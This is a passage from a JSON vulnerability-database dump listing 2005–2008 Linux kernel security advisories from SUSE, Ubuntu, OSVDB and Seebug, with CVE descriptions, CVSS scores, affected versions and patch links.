fs/namespace.c did not verify that the caller has the CAP_SYS_ADMIN capability, which allows local users to gain privileges or cause a denial of service by modifying the properties of a mountpoint. CVE-2008-2812: Various NULL ptr checks have been added to tty op functions, which might have been used by local attackers to execute code. We think that this affects only devices openable by root, so the impact is limited. For more information consult the RPM changelog. 2) Solution or Work-Around\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2008-10-02T11:55:46", "published": "2008-10-02T11:55:46", "id": "SUSE-SA:2008:049", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00003.html", "type": "suse", "title": "remote denial of service in kernel", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:49:16", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3272", "CVE-2008-3276", "CVE-2008-3275", "CVE-2008-1673"], "description": "The openSUSE 11.0 kernel was updated to 2.6.25.16.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2008-09-11T13:24:55", "published": "2008-09-11T13:24:55", "id": "SUSE-SA:2008:044", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-09/msg00001.html", "type": "suse", "title": "remote denial of service in kernel", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:50", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6282", "CVE-2008-1375", "CVE-2008-1615", "CVE-2008-1367"], "description": "This kernel update fixes the following security problems:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2008-07-02T13:19:53", "published": "2008-07-02T13:19:53", "id": "SUSE-SA:2008:031", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-07/msg00000.html", "type": "suse", "title": "remote denial of service in kernel", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-08T23:33:59", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2136", "CVE-2007-6282", "CVE-2008-2826", "CVE-2008-0598", "CVE-2007-6712", "CVE-2008-2137", "CVE-2008-1615", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-2358", "CVE-2008-2750", "CVE-2008-2148", "CVE-2008-1673"], "description": "Dirk Nehring discovered that the IPsec protocol stack did not correctly \nhandle fragmented ESP packets. A remote attacker could exploit this to \ncrash the system, leading to a denial of service. (CVE-2007-6282)\n\nJohannes Bauer discovered that the 64bit kernel did not correctly handle \nhrtimer updates. A local attacker could request a large expiration value \nand cause the system to hang, leading to a denial of service. \n(CVE-2007-6712)\n\nTavis Ormandy discovered that the ia32 emulation under 64bit kernels did \nnot fully clear uninitialized data. A local attacker could read private \nkernel memory, leading to a loss of privacy. (CVE-2008-0598)\n\nJan Kratochvil discovered that PTRACE did not correctly handle certain \ncalls when running under 64bit kernels. A local attacker could exploit this \nto crash the system, leading to a denial of service. (CVE-2008-1615)\n\nWei Wang discovered that the ASN.1 decoding routines in CIFS and SNMP NAT \ndid not correctly handle certain length values. Remote attackers could \nexploit this to execute arbitrary code or crash the system. (CVE-2008-1673)\n\nPaul Marks discovered that the SIT interfaces did not correctly manage \nallocated memory. A remote attacker could exploit this to fill all \navailable memory, leading to a denial of service. (CVE-2008-2136)\n\nDavid Miller and Jan Lieskovsky discovered that the Sparc kernel did not \ncorrectly range-check memory regions allocated with mmap. A local attacker \ncould exploit this to crash the system, leading to a denial of service. \n(CVE-2008-2137)\n\nThe sys_utimensat system call did not correctly check file permissions in \ncertain situations. A local attacker could exploit this to modify the file \ntimes of arbitrary files which could lead to a denial of service. \n(CVE-2008-2148)\n\nBrandon Edwards discovered that the DCCP system in the kernel did not \ncorrectly check feature lengths. A remote attacker could exploit this to \nexecute arbitrary code. (CVE-2008-2358)\n\nA race condition was discovered between ptrace and utrace in the kernel. A \nlocal attacker could exploit this to crash the system, leading to a denial \nof service. (CVE-2008-2365)\n\nThe copy_to_user routine in the kernel did not correctly clear memory \ndestination addresses when running on 64bit kernels. A local attacker could \nexploit this to gain access to sensitive kernel memory, leading to a loss \nof privacy. (CVE-2008-2729)\n\nThe PPP over L2TP routines in the kernel did not correctly handle certain \nmessages. A remote attacker could send a specially crafted packet that \ncould crash the system or execute arbitrary code. (CVE-2008-2750)\n\nGabriel Campana discovered that SCTP routines did not correctly check for \nlarge addresses. A local user could exploit this to allocate all available \nmemory, leading to a denial of service. (CVE-2008-2826)", "edition": 5, "modified": "2008-07-15T00:00:00", "published": "2008-07-15T00:00:00", "id": "USN-625-1", "href": "https://ubuntu.com/security/notices/USN-625-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:25:44", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3272", "CVE-2008-0598", "CVE-2008-2931", "CVE-2008-3275", "CVE-2008-2812"], "description": "It was discovered that there were multiple NULL-pointer function \ndereferences in the Linux kernel terminal handling code. A local attacker \ncould exploit this to execute arbitrary code as root, or crash the system, \nleading to a denial of service. (CVE-2008-2812)\n\nThe do_change_type routine did not correctly validation administrative \nusers. A local attacker could exploit this to block mount points or cause \nprivate mounts to be shared, leading to denial of service or a possible \nloss of privacy. (CVE-2008-2931)\n\nTobias Klein discovered that the OSS interface through ALSA did not \ncorrectly validate the device number. A local attacker could exploit this \nto access sensitive kernel memory, leading to a denial of service or a loss \nof privacy. (CVE-2008-3272)\n\nZoltan Sogor discovered that new directory entries could be added to \nalready deleted directories. A local attacker could exploit this, filling \nup available memory and disk space, leading to a denial of service. \n(CVE-2008-3275)\n\nIn certain situations, the fix for CVE-2008-0598 from USN-623-1 was causing \ninfinite loops in the writev syscall. This update corrects the mistake. We \napologize for the inconvenience.", "edition": 5, "modified": "2008-08-25T00:00:00", "published": "2008-08-25T00:00:00", "id": "USN-637-1", "href": "https://ubuntu.com/security/notices/USN-637-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:36:25", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3848", "CVE-2007-3104", "CVE-2005-0504", "CVE-2007-3105", "CVE-2007-4308", "CVE-2007-2242"], "description": "A buffer overflow was discovered in the Moxa serial driver. Local \nattackers could execute arbitrary code and gain root privileges. \n(CVE-2005-0504)\n\nA flaw was discovered in the IPv6 stack's handling of type 0 route headers. \nBy sending a specially crafted IPv6 packet, a remote attacker could cause \na denial of service between two IPv6 hosts. (CVE-2007-2242)\n\nA flaw in the sysfs_readdir function allowed a local user to cause a \ndenial of service by dereferencing a NULL pointer. (CVE-2007-3104)\n\nA buffer overflow was discovered in the random number generator. In \nenvironments with granular assignment of root privileges, a local attacker \ncould gain additional privileges. (CVE-2007-3105)\n\nIt was discovered that certain setuid-root processes did not correctly \nreset process death signal handlers. A local user could manipulate this \nto send signals to processes they would not normally have access to. \n(CVE-2007-3848)\n\nIt was discovered that the aacraid SCSI driver did not correctly check \npermissions on certain ioctls. A local attacker could cause a denial \nof service or gain privileges. (CVE-2007-4308)", "edition": 5, "modified": "2007-08-31T00:00:00", "published": "2007-08-31T00:00:00", "id": "USN-508-1", "href": "https://ubuntu.com/security/notices/USN-508-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "cvelist": ["CVE-2005-0504"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in the Linux kernel. The MoxaDriverIoctl() function fails to validate user-supplied data resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA local overflow exists in the Linux kernel. The MoxaDriverIoctl() function fails to validate user-supplied data resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.kernel.org/\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1067)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1069)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1070)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1082)\nSecurity Tracker: 1013273\n[Secunia Advisory ID:13784](https://secuniaresearch.flexerasoftware.com/advisories/13784/)\n[Secunia Advisory ID:17002](https://secuniaresearch.flexerasoftware.com/advisories/17002/)\n[Secunia Advisory ID:16570](https://secuniaresearch.flexerasoftware.com/advisories/16570/)\n[Secunia Advisory ID:20162](https://secuniaresearch.flexerasoftware.com/advisories/20162/)\n[Secunia Advisory ID:16571](https://secuniaresearch.flexerasoftware.com/advisories/16571/)\n[Secunia Advisory ID:20163](https://secuniaresearch.flexerasoftware.com/advisories/20163/)\n[Secunia Advisory ID:26651](https://secuniaresearch.flexerasoftware.com/advisories/26651/)\n[Secunia Advisory ID:14710](https://secuniaresearch.flexerasoftware.com/advisories/14710/)\n[Secunia Advisory ID:20202](https://secuniaresearch.flexerasoftware.com/advisories/20202/)\n[Secunia Advisory ID:20338](https://secuniaresearch.flexerasoftware.com/advisories/20338/)\n[Related OSVDB ID: 12836](https://vulners.com/osvdb/OSVDB:12836)\n[Related OSVDB ID: 12838](https://vulners.com/osvdb/OSVDB:12838)\n[Related OSVDB ID: 12835](https://vulners.com/osvdb/OSVDB:12835)\nRedHat RHSA: RHSA-2005:663\nOther Advisory URL: http://rhn.redhat.com/errata/RHSA-2005-551.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-508-1\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2005_18_kernel.html\nOther Advisory URL: http://rhn.redhat.com/errata/RHSA-2005-529.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-01/0225.html\nISS X-Force ID: 18821\n[CVE-2005-0504](https://vulners.com/cve/CVE-2005-0504)\nBugtraq ID: 12195\n", "modified": "2005-01-07T07:33:09", "published": "2005-01-07T07:33:09", "href": "https://vulners.com/osvdb/OSVDB:12837", "id": "OSVDB:12837", "type": "osvdb", "title": "Linux Kernel MOXA Serial Driver Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T21:40:22", "description": "BUGTRAQ ID: 29589\r\nCVE(CAN) ID: CVE-2008-1673\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u7684cifs\u548cip_nat_snmp_basic\u6a21\u5757\u4e2d\u7684ASN.1 BER\u89e3\u7801\u5668\u6ca1\u6709\u6b63\u786e\u5730\u8ba1\u7b97\u7f13\u51b2\u533a\u5927\u5c0f\uff0c\u5982\u679c\u8fdc\u7a0b\u653b\u51fb\u8005\u5411\u6709\u6f0f\u6d1e\u7684\u7cfb\u7edf\u53d1\u9001\u4e86\u7279\u5236\u7684BER\u7f16\u7801\u6570\u636e\u7684\u8bdd\uff0c\u5c31\u53ef\u4ee5\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\n\n\nLinux kernel 2.6.x\r\nLinux kernel 2.4.x\n Debian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08DSA-1592-2\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1592-2\uff1aNew Linux 2.6.18 packages fix overflow conditions\r\n\u94fe\u63a5\uff1a<a href=http://www.debian.org/security/2008/dsa-1592 target=_blank>http://www.debian.org/security/2008/dsa-1592</a>\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5-git1.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5-git1.bz2</a>\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>", "published": "2008-06-11T00:00:00", "type": "seebug", "title": "Linux Kernel BER\u89e3\u7801\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1673"], "modified": "2008-06-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3393", "id": "SSV:3393", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:30:35", "description": "CVE-2008-1673\r\n\r\nThe Linux Kernel is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.\r\n\r\nAn attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.\n\nUbuntu Ubuntu Linux 8.04 LTS sparc\r\nUbuntu Ubuntu Linux 8.04 LTS powerpc\r\nUbuntu Ubuntu Linux 8.04 LTS lpia\r\nUbuntu Ubuntu Linux 8.04 LTS i386\r\nUbuntu Ubuntu Linux 8.04 LTS amd64\r\nUbuntu Ubuntu Linux 7.10 sparc\r\nUbuntu Ubuntu Linux 7.10 powerpc\r\nUbuntu Ubuntu Linux 7.10 lpia\r\nUbuntu Ubuntu Linux 7.10 i386\r\nUbuntu Ubuntu Linux 7.10 amd64\r\nUbuntu Ubuntu Linux 7.04 sparc\r\nUbuntu Ubuntu Linux 7.04 powerpc\r\nUbuntu Ubuntu Linux 7.04 i386\r\nUbuntu Ubuntu Linux 7.04 amd64\r\nUbuntu Ubuntu Linux 6.06 LTS sparc\r\nUbuntu Ubuntu Linux 6.06 LTS powerpc\r\nUbuntu Ubuntu Linux 6.06 LTS i386\r\nUbuntu Ubuntu Linux 6.06 LTS amd64\r\nS.u.S.E. SUSE Linux Enterprise Server 10 SP2\r\nS.u.S.E. SUSE Linux Enterprise Desktop 10 SP2\r\nS.u.S.E. SUSE Linux Enterprise 10 SP2 DEBUGINFO\r\nS.u.S.E. SLE SDK 10 SP2\r\nrPath rPath Linux 2\r\nrPath rPath Linux 1\r\nrPath Appliance Platform Linux Service 1\r\nRedHat Fedora 9 0\r\nRedHat Fedora 8 0\r\nMandrakeSoft Linux Mandrake 2008.1 x86_64\r\nMandrakeSoft Linux Mandrake 2008.1\r\nMandrakeSoft Corporate Server 4.0 x86_64\r\nMandrakeSoft Corporate Server 4.0\r\nLinux kernel 2.6.25 \r\nLinux kernel 2.6.25 \r\nLinux kernel 2.6.24 .2\r\nLinux kernel 2.6.24 .1\r\nLinux kernel 2.6.24 -rc5\r\nLinux kernel 2.6.24 -rc4\r\nLinux kernel 2.6.24 -rc3\r\nLinux kernel 2.6.23 .7\r\nLinux kernel 2.6.23 .6\r\nLinux kernel 2.6.23 .5\r\nLinux kernel 2.6.23 .4\r\nLinux kernel 2.6.23 .3\r\nLinux kernel 2.6.23 .2\r\nLinux kernel 2.6.23 -rc2\r\nLinux kernel 2.6.23 -rc1\r\nLinux kernel 2.6.23 \r\nLinux kernel 2.6.22 7\r\nLinux kernel 2.6.22 1\r\nLinux kernel 2.6.22 .8\r\nLinux kernel 2.6.22 .6\r\nLinux kernel 2.6.22 .5\r\nLinux kernel 2.6.22 .4\r\nLinux kernel 2.6.22 .3\r\nLinux kernel 2.6.22 .17\r\nLinux kernel 2.6.22 .16\r\nLinux kernel 2.6.22 .15\r\nLinux kernel 2.6.22 .14\r\nLinux kernel 2.6.22 .13\r\nLinux kernel 2.6.22 .12\r\nLinux kernel 2.6.22 .11\r\nLinux kernel 2.6.22 \r\nLinux kernel 2.6.22 \r\nLinux kernel 2.6.21 4\r\nLinux kernel 2.6.21 .7\r\nLinux kernel 2.6.21 .6\r\nLinux kernel 2.6.21 .2\r\nLinux kernel 2.6.21 .1\r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.20 .9\r\nLinux kernel 2.6.20 .8\r\nLinux kernel 2.6.20 .5\r\nLinux kernel 2.6.20 .4\r\nLinux kernel 2.6.20 .15\r\nLinux kernel 2.6.20 \r\nLinux kernel 2.6.20 \r\nLinux kernel 2.6.19 1\r\nLinux kernel 2.6.19 .2\r\nLinux kernel 2.6.19 .1\r\nLinux kernel 2.6.19 -rc4\r\nLinux kernel 2.6.19 -rc3\r\nLinux kernel 2.6.19 -rc2\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.19 -rc1\r\nLinux kernel 2.6.19 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.18 .4\r\nLinux kernel 2.6.18 .3\r\nLinux kernel 2.6.18 .1\r\nLinux kernel 2.6.18 \r\nLinux kernel 2.6.17 .8\r\nLinux kernel 2.6.17 .7\r\nLinux kernel 2.6.17 .6\r\nLinux kernel 2.6.17 .5\r\nLinux kernel 2.6.17 .3\r\nLinux kernel 2.6.17 .2\r\nLinux kernel 2.6.17 .14\r\nLinux kernel 2.6.17 .13\r\nLinux kernel 2.6.17 .12\r\nLinux kernel 2.6.17 .11\r\nLinux kernel 2.6.17 .10\r\nLinux kernel 2.6.17 .1\r\nLinux kernel 2.6.17 -rc5\r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.16 27\r\nLinux kernel 2.6.16 13\r\nLinux kernel 2.6.16 .9\r\nLinux kernel 2.6.16 .7\r\nLinux kernel 2.6.16 .23\r\nLinux kernel 2.6.16 .19\r\nLinux kernel 2.6.16 .12\r\nLinux kernel 2.6.16 .11\r\nLinux kernel 2.6.16 .1\r\nLinux kernel 2.6.16 -rc1\r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.15 .4\r\nLinux kernel 2.6.15 .3\r\nLinux kernel 2.6.15 .2\r\nLinux kernel 2.6.15 .1\r\nLinux kernel 2.6.15 -rc3\r\nLinux kernel 2.6.15 -rc2\r\nLinux kernel 2.6.15 -rc1\r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.14 .5\r\nLinux kernel 2.6.14 .4\r\nLinux kernel 2.6.14 .3\r\nLinux kernel 2.6.14 .2\r\nLinux kernel 2.6.14 .1\r\nLinux kernel 2.6.14 -rc4\r\nLinux kernel 2.6.14 -rc3\r\nLinux kernel 2.6.14 -rc2\r\nLinux kernel 2.6.14 -rc1\r\nLinux kernel 2.6.14 \r\nLinux kernel 2.6.14 \r\nLinux kernel 2.6.13 .4\r\nLinux kernel 2.6.13 .3\r\nLinux kernel 2.6.13 .2\r\nLinux kernel 2.6.13 .1\r\nLinux kernel 2.6.13 -rc7\r\nLinux kernel 2.6.13 -rc6\r\nLinux kernel 2.6.13 -rc4\r\nLinux kernel 2.6.13 -rc1\r\nLinux kernel 2.6.13 \r\nLinux kernel 2.6.13 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.12 .6\r\nLinux kernel 2.6.12 .5\r\nLinux kernel 2.6.12 .4\r\nLinux kernel 2.6.12 .3\r\nLinux kernel 2.6.12 .22\r\nLinux kernel 2.6.12 .2\r\nLinux kernel 2.6.12 .12\r\nLinux kernel 2.6.12 .1\r\nLinux kernel 2.6.12 -rc5\r\nLinux kernel 2.6.12 -rc4\r\nLinux kernel 2.6.12 -rc1\r\nLinux kernel 2.6.12 \r\nLinux kernel 2.6.12 \r\nLinux kernel 2.6.11 .8\r\nLinux kernel 2.6.11 .7\r\nLinux kernel 2.6.11 .6\r\nLinux kernel 2.6.11 .5\r\nLinux kernel 2.6.11 .4\r\nLinux kernel 2.6.11 .12\r\nLinux kernel 2.6.11 .11\r\nLinux kernel 2.6.11 -rc4\r\nLinux kernel 2.6.11 -rc3\r\nLinux kernel 2.6.11 -rc2\r\nLinux kernel 2.6.11 \r\nLinux kernel 2.6.11 \r\nLinux kernel 2.6.10 rc2\r\nLinux kernel 2.6.10 \r\nLinux kernel 2.6.10 \r\nLinux kernel 2.6.2 \r\nLinux kernel 2.6.1 -rc2\r\nLinux kernel 2.6.1 -rc1\r\nLinux kernel 2.6.1 \r\nLinux kernel 2.6 .10\r\nLinux kernel 2.6 -test9-CVS\r\nLinux kernel 2.6 -test9\r\nLinux kernel 2.6 -test8\r\nLinux kernel 2.6 -test7\r\nLinux kernel 2.6 -test6\r\nLinux kernel 2.6 -test5\r\nLinux kernel 2.6 -test4\r\nLinux kernel 2.6 -test3\r\nLinux kernel 2.6 -test2\r\nLinux kernel 2.6 -test11\r\nLinux kernel 2.6 -test10\r\nLinux kernel 2.6 -test1\r\nLinux kernel 2.6 \r\nLinux kernel 2.4.36 5\r\nLinux kernel 2.4.36 4\r\nLinux kernel 2.4.36 1\r\nLinux kernel 2.4.36 \r\nLinux kernel 2.4.35 3\r\nLinux kernel 2.4.34 \r\nLinux kernel 2.4.34 \r\nLinux kernel 2.4.34 \r\nLinux kernel 2.4.33 2\r\nLinux kernel 2.4.33 .7\r\nLinux kernel 2.4.33 .6\r\nLinux kernel 2.4.33 .6\r\nLinux kernel 2.4.33 .5\r\nLinux kernel 2.4.33 .4\r\nLinux kernel 2.4.33 .3\r\nLinux kernel 2.4.33 .3\r\nLinux kernel 2.4.33 -pre1\r\nLinux kernel 2.4.33 \r\nLinux kernel 2.4.33 \r\nLinux kernel 2.4.32 -pre2\r\nLinux kernel 2.4.32 -pre1\r\nLinux kernel 2.4.32 \r\nLinux kernel 2.4.31 -pre1\r\nLinux kernel 2.4.31 \r\nLinux kernel 2.4.30 rc3\r\nLinux kernel 2.4.30 rc2\r\nLinux kernel 2.4.30 \r\nLinux kernel 2.4.29 -rc2\r\nLinux kernel 2.4.29 -rc1\r\nLinux kernel 2.4.29 \r\nLinux kernel 2.4.28 \r\nLinux kernel 2.4.27 -pre5\r\nLinux kernel 2.4.27 -pre4\r\nLinux kernel 2.4.27 -pre3\r\nLinux kernel 2.4.27 -pre2\r\nLinux kernel 2.4.27 -pre1\r\nLinux kernel 2.4.27 \r\nLinux kernel 2.4.26 \r\nLinux kernel 2.4.25 \r\nLinux kernel 2.4.24 -ow1\r\nLinux kernel 2.4.24 \r\nLinux kernel 2.4.23 -pre9\r\nLinux kernel 2.4.23 -ow2\r\nLinux kernel 2.4.23 \r\nLinux kernel 2.4.22 \r\nLinux kernel 2.4.21 pre7\r\nLinux kernel 2.4.21 pre4\r\nLinux kernel 2.4.21 pre1\r\nLinux kernel 2.4.21 \r\n+ Conectiva Linux 9.0 \r\n+ MandrakeSoft Linux Mandrake 9.1 ppc\r\n+ MandrakeSoft Linux Mandrake 9.1 \r\n+ RedHat Desktop 3.0 \r\n+ RedHat Enterprise Linux AS 3\r\n+ RedHat Enterprise Linux ES 3\r\n+ RedHat Enterprise Linux WS 3\r\n+ S.u.S.E. Linux Enterprise Server 8\r\n+ S.u.S.E. Linux Personal 9.0 x86_64\r\n+ S.u.S.E. Linux Personal 9.0 \r\nLinux kernel 2.4.20 \r\nLinux kernel 2.4.19 -pre6\r\nLinux kernel 2.4.19 -pre5\r\nLinux kernel 2.4.19 -pre4\r\nLinux kernel 2.4.19 -pre3\r\nLinux kernel 2.4.19 -pre2\r\nLinux kernel 2.4.19 -pre1\r\nLinux kernel 2.4.19 \r\nLinux kernel 2.4.18 pre-8\r\nLinux kernel 2.4.18 pre-7\r\nLinux kernel 2.4.18 pre-6\r\nLinux kernel 2.4.18 pre-5\r\nLinux kernel 2.4.18 pre-4\r\nLinux kernel 2.4.18 pre-3\r\nLinux kernel 2.4.18 pre-2\r\nLinux kernel 2.4.18 pre-1\r\nLinux kernel 2.4.18 x86\r\nLinux kernel 2.4.18 \r\nLinux kernel 2.4.17 \r\nLinux kernel 2.4.16 \r\nLinux kernel 2.4.15 \r\nLinux kernel 2.4.14 \r\nLinux kernel 2.4.13 \r\nLinux kernel 2.4.12 \r\n+ Conectiva Linux 7.0 \r\nLinux kernel 2.4.11 \r\nLinux kernel 2.4.10 \r\n+ S.u.S.E. Linux 7.3 \r\nLinux kernel 2.4.3 \r\nLinux kernel 2.4.2 \r\nLinux kernel 2.4.1 \r\nLinux kernel 2.4 .0-test9\r\nLinux kernel 2.4 .0-test8\r\nLinux kernel 2.4 .0-test7\r\nLinux kernel 2.4 .0-test6\r\nLinux kernel 2.4 .0-test5\r\nLinux kernel 2.4 .0-test4\r\nLinux kernel 2.4 .0-test3\r\nLinux kernel 2.4 .0-test2\r\nLinux kernel 2.4 .0-test12\r\nLinux kernel 2.4 .0-test11\r\nLinux kernel 2.4 .0-test10\r\nLinux kernel 2.4 .0-test1\r\nLinux kernel 2.6.25.4\r\nLinux kernel 2.6.25.3\r\nLinux kernel 2.6.25.2\r\nLinux kernel 2.6.25.1\r\nLinux kernel 2.6.24.6\r\nLinux kernel 2.6.24-rc2\r\nLinux kernel 2.6.24-rc1\r\nLinux kernel 2.6.23.14\r\nLinux kernel 2.6.23.10\r\nLinux kernel 2.6.23.1\r\nLinux kernel 2.6.23.09\r\nLinux kernel 2.6.22-rc7\r\nLinux kernel 2.6.22-rc1\r\nLinux kernel 2.6.21-RC6\r\nLinux kernel 2.6.21-RC5\r\nLinux kernel 2.6.21-RC4\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.20.3\r\nLinux kernel 2.6.20.2\r\nLinux kernel 2.6.20.13\r\nLinux kernel 2.6.20.11\r\nLinux kernel 2.6.20.1\r\nLinux kernel 2.6.20-rc2\r\nLinux kernel 2.6.20-2\r\nLinux kernel 2.6.18-8.1.8.el5\r\nLinux kernel 2.6.18-53\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.15.5\r\nLinux kernel 2.6.15.11\r\nLinux kernel 2.6.15-27.48\r\nLinux kernel 2.6.11.4\r\nLinux kernel 2.4.34.6\r\nLinux kernel 2.4.34.5\r\nLinux kernel 2.4.34.3\r\nLinux kernel 2.4.33.5\r\nLinux kernel 2.4.33.4\r\nDebian Linux 4.0 sparc\r\nDebian Linux 4.0 s/390\r\nDebian Linux 4.0 powerpc\r\nDebian Linux 4.0 mipsel\r\nDebian Linux 4.0 mips\r\nDebian Linux 4.0 m68k\r\nDebian Linux 4.0 ia-64\r\nDebian Linux 4.0 ia-32\r\nDebian Linux 4.0 hppa\r\nDebian Linux 4.0 arm\r\nDebian Linux 4.0 amd64\r\nDebian Linux 4.0 alpha\r\nDebian Linux 4.0\n The vendor has released an update to address this issue. Please see the references for more information.\r\n\r\n\r\nLinux kernel 2.6.20.2\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.21-RC3\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> 